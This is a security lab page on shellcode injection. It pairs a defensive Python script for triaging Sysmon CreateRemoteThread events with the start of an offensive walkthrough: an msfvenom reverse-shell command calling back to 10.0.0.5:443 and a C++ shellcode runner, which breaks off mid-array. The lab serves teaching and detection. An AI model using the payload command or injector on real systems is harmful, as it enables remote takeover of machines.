CreateRemoteThread Shellcode Injection

Injecting shellcode into a local process.

This lab explores some classic ways of injecting shellcode into a process memory and executing it.
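As a defensive counterpart to the injection techniques this lab walks through, here is an added example (not part of the original lab or its code) that triages Sysmon Event ID 8 (CreateRemoteThread) records. Sysmon resolves the new thread's start address to a loaded module and exported function when it can; shellcode written into memory obtained with VirtualAllocEx belongs to no module, so the StartModule field comes back empty, which is the main signal used below. The three sample records, their paths, PIDs and addresses are constructed for the example, and the scoring weights and threshold are my own assumptions rather than any vendor's rule.

```python
"""Triage Sysmon Event ID 8 (CreateRemoteThread) records for injection indicators.

Added example, not from the original lab. The sample events are constructed;
paths, PIDs and addresses are invented. Scoring weights are an assumption.
"""
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed sample records in Sysmon's event XML layout (not captured telemetry).
SAMPLE_EVENTS = [
    # 1: thread start address in unbacked memory, source binary in a user directory.
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>8</EventID><Computer>lab-host</Computer></System>
  <EventData>
    <Data Name="SourceProcessId">4120</Data>
    <Data Name="SourceImage">C:\Users\lab\inject.exe</Data>
    <Data Name="TargetProcessId">2288</Data>
    <Data Name="TargetImage">C:\Windows\System32\notepad.exe</Data>
    <Data Name="NewThreadId">5312</Data>
    <Data Name="StartAddress">0x000001F2A3C50000</Data>
    <Data Name="StartModule"></Data>
    <Data Name="StartFunction"></Data>
  </EventData>
</Event>""",
    # 2: start address resolved to an exported function in ntdll, system source.
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>8</EventID><Computer>lab-host</Computer></System>
  <EventData>
    <Data Name="SourceProcessId">912</Data>
    <Data Name="SourceImage">C:\Windows\System32\svchost.exe</Data>
    <Data Name="TargetProcessId">3356</Data>
    <Data Name="TargetImage">C:\Windows\System32\RuntimeBroker.exe</Data>
    <Data Name="NewThreadId">6020</Data>
    <Data Name="StartAddress">0x00007FFB2C4A1F20</Data>
    <Data Name="StartModule">C:\Windows\System32\ntdll.dll</Data>
    <Data Name="StartFunction">RtlUserThreadStart</Data>
  </EventData>
</Event>""",
    # 3: a process-creation event (ID 1); the triage must ignore it.
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>1</EventID><Computer>lab-host</Computer></System>
  <EventData>
    <Data Name="ProcessId">4120</Data>
    <Data Name="Image">C:\Users\lab\inject.exe</Data>
  </EventData>
</Event>""",
]


def parse_sysmon_event(xml_text: str) -> dict:
    """Flatten one Sysmon event into a dict: event_id plus every EventData/Data field."""
    root = ET.fromstring(xml_text)
    event_id = int(root.findtext("e:System/e:EventID", namespaces=NS))
    data = {}
    for d in root.iterfind("e:EventData/e:Data", NS):
        data[d.get("Name")] = (d.text or "").strip()
    return {"event_id": event_id, **data}


def score_remote_thread(event: dict) -> tuple[int, list[str]]:
    """Score an Event ID 8 record; weights are an assumption for this example."""
    score, reasons = 0, []
    if not event.get("StartModule"):
        # Sysmon could not map the start address to any loaded module: classic
        # signature of shellcode placed in private memory with WriteProcessMemory.
        score += 3
        reasons.append("thread start address is not inside any loaded module (unbacked memory)")
    elif not event.get("StartFunction"):
        # Inside a module but not at an export: weaker, worth a note only.
        score += 1
        reasons.append("start address inside a module but not at an exported function")
    source = event.get("SourceImage", "").lower()
    if not source.startswith("c:\\windows\\"):
        score += 1
        reasons.append("source process image outside the Windows directory")
    return score, reasons


def triage(xml_events, threshold: int = 3) -> list[dict]:
    """Return one alert record per Event ID 8; other event IDs are skipped."""
    alerts = []
    for xml_text in xml_events:
        event = parse_sysmon_event(xml_text)
        if event["event_id"] != 8:
            continue
        score, reasons = score_remote_thread(event)
        alerts.append({
            "source": event["SourceImage"],
            "target": event["TargetImage"],
            "start_address": event["StartAddress"],
            "score": score,
            "suspicious": score >= threshold,
            "reasons": reasons,
        })
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        flag = "SUSPICIOUS" if alert["suspicious"] else "ok"
        print(f"[{flag}] {alert['source']} -> {alert['target']} "
              f"@ {alert['start_address']} score={alert['score']}")
        for reason in alert["reasons"]:
            print("    -", reason)
```

Run against real Sysmon exports, the same parser works on the XML that `wevtutil qe Microsoft-Windows-Sysmon/Operational /f:xml` emits per event; the empty StartModule check is the one worth keeping as a standalone rule, while the source-path heuristic only adds context and will fire on plenty of legitimate third-party software.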

Executing Shellcode in Local Process

First off, a simple test of how to execute shellcode directly from a C++ program.

Generating shellcode for a reverse shell:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=443 -f c -b '\x00\x0a\x0d'

C++ code to inject and invoke the shellcode:

inject-local-process.cpp
#include "stdafx.h"
#include "Windows.h"

int main()
{
	unsigned char shellcode[] =
		"\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d\x05\xef\xff"
		"\xff\xff\x48\xbb\x1d\xbe\xa2\x7b\x2b\x90\xe1\xec\x48\x31\x58"
		"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xe1\xf6\x21\x9f\xdb\x78"
		"\x21\xec\x1d\xbe\xe3\x2a\x6